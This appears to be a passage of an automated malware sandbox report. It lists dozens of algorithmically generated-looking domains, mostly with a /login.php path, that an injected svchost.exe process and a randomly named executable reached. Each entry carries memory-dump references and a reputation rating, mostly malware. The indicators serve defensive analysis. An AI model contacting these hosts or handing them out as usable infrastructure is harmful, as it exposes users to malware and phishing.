                                                                                                                                                                                                            http://gadycew.com/login.phpsvchost.exe, 00000002.00000003.2649333466.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347178577.0000000003322000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349507832.000000000332F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349422845.000000000332C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347333934.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347614295.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347613705.0000000003325000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://vocyjet.com/login.phpsvchost.exe, 00000002.00000003.2346403174.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346603921.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346961253.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346691543.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349309789.00000000092C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lyxyvyn.com/login.phpsvchost.exe, 00000002.00000003.2726510414.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2879404289.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2925665962.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2746470521.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2928746848.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2913582701.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427876534.00000000092B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lykyfud.com/login.phpsvchost.exe, 00000002.00000003.2649333466.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2657780583.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2649747897.00000000040F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349255775.0000000003379000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2672508299.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2647496494.00000000040F3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://puzylyp.com/login.phpsvchost.exe, 00000002.00000003.2397665900.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2178063171.000000000923F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2197741050.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2185076169.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388042380.00000000092C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2399948508.0000000009324000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2387081098.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2604863482.0000000001098000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2622033644.0000000008E90000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2718258067.0000000008D8F000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000003.2558068199.0000000008D9F000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2671362092.00000000086C1000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2608350004.0000000000802000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2614917822.000000000154E000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2745540362.00000000093CD000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000013.00000002.2853769839.000000000988D000.00000004.00000010.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000013.00000002.2640207678.0000000001363000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000013.00000002.2756051050.000000000914B000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000015.00000002.2856769526.0000000008FC3000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000015.00000002.2676238100.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000018.00000002.2676884944.00000000009FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://galyvuz.com/login.phpsvchost.exe, 00000002.00000003.2666875773.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667617957.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2672508299.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://qeqyxov.com/login.phpsvchost.exe, 00000002.00000003.2397665900.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2414263063.00000000033CA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388023341.0000000000852000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425745567.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2184899677.00000000008E8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2386712444.00000000040EE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2422762232.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2207439218.00000000008E9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388405607.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2387387248.00000000040F3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2178331950.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2185076169.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398171627.0000000000854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513835440.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499628727.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2387081098.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2604863482.00000000010D0000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2622033644.0000000008E29000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2622033644.0000000008E90000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2718258067.0000000008D47000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2718258067.0000000008D8F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://vowyrif.com/login.phpsvchost.exe, 00000002.00000003.2346403174.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346603921.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2657780583.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347033417.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2649350353.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356885542.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346691543.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356000937.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349309789.00000000092C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lymyvin.com/svchost.exe, 00000002.00000003.2329963433.0000000003319000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328865580.0000000003315000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329926664.0000000003317000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328162774.0000000003315000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lyrywoj.com/login.phpsvchost.exe, 00000002.00000003.2397665900.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3418889094.000000000335E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3419128942.000000000336B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427392798.0000000009288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2925665962.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3278908147.000000000335C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425745567.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2927397659.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2381728153.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2928746848.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3279511546.0000000003369000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2422762232.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2928459922.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427876534.00000000092B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lyryman.com/login.phpsvchost.exe, 00000002.00000003.2726510414.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2360502034.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2746470521.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2746888339.0000000000854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358968663.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358089375.00000000092C8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2829874698.000000000084D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2363422290.00000000092C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2359102012.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2363692365.00000000092C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2362592176.00000000092C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://vofypam.com/http://pujycyp.com/http://volydyk.com/http://pujycyp.com/http://qetyrul.com/http:svchost.exe, 00000002.00000003.2667584330.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2666875773.00000000040F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://vocyruk.com/login.phpsvchost.exe, 00000002.00000003.2397665900.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2197741050.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2178331950.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2178415911.00000000033F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2197653218.0000000009298000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2185076169.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388042380.00000000092C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202867008.0000000009299000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2387081098.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2649196751.00000000091F7000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2622033644.0000000008E20000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000003.2572564754.0000000000FB2000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2718258067.0000000008D8F000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2613849314.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2744689381.0000000009396000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000003.2558068199.0000000008D9F000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2671362092.00000000086C1000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2608350004.00000000007DF000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2614917822.00000000014D8000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2745540362.0000000009360000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2614917822.00000000015A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: phishing
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://qexyfuq.com/login.phpsvchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2693258532.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2672508299.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356885542.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356000937.00000000092BE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lyvysur.com/login.phpsvchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329364841.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2327922219.00000000092C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2607855494.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2330522610.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2609571355.0000000003368000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lyvymej.com/login.phpsvchost.exe, 00000002.00000003.2649333466.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2649350353.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347333934.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347614295.0000000000853000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://qebyqeq.com/login.phpsvchost.exe, 00000002.00000003.2649333466.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347333934.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347614295.0000000000853000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://vowypim.com/login.phpsvchost.exe, 00000002.00000003.2376137841.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2879404289.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2379940773.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2376002854.000000000923B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2896263867.0000000000854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2884058737.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2375028226.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380116523.00000000033EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lyryled.com/login.phpsvchost.exe, 00000002.00000003.2289346650.00000000008E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296615273.000000000337B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2289345179.00000000092B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://www.google.comt.4svchost.exe, 00000002.00000003.2376391418.0000000003342000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://vojygok.com/login.phpsvchost.exe, 00000002.00000003.2344956997.0000000003378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2345061243.0000000003356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2341852646.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2342419975.0000000003378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2344054756.0000000003378000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://galydyw.com/login.phpsvchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2693258532.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356885542.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356000937.00000000092BE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lyryjir.com/login.phpsvchost.exe, 00000002.00000003.2513678339.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2511691560.0000000003325000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2310815345.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2530049232.000000000332A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2511442886.0000000003330000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2542956129.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513019694.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499635923.0000000000855000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499110020.0000000003378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2511703150.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2511409546.0000000003323000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://qekysip.com/svchost.exe, 00000002.00000003.2498726255.000000000085D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2310938686.00000000092CF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2309738735.00000000092BB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2498955488.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2507122526.00000000040F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://gahyvab.com/login.phpsvchost.exe, 00000002.00000002.3428370692.00000000092EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2919185604.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3287645590.00000000092EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2905696441.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3426788667.0000000009235000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://pujycil.com/login.phpsvchost.exe, 00000002.00000002.3428370692.00000000092EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2919185604.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427392798.0000000009288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388023341.0000000000852000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2925665962.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3287645590.00000000092EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2381728153.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2928746848.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3408110880.0000000000855000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3407860513.0000000000826000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398171627.0000000000854000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://puzymup.com/login.phpsvchost.exe, 00000002.00000003.2885524752.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2377062429.0000000003357000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2879404289.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2902106768.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2896263867.0000000000854000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://pumycug.com/svchost.exe, 00000002.00000003.2329963433.0000000003319000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328865580.0000000003315000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329926664.0000000003317000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328162774.0000000003315000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://vojyduf.com/login.phpsvchost.exe, 00000002.00000003.2649333466.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2657780583.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667617957.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2649350353.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2672508299.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347333934.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347614295.0000000000853000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lysytoj.com/login.phpsvchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760150538.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://qedynaq.com/login.php//vofymem.com/svchost.exe, 00000002.00000003.2587482853.00000000033CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
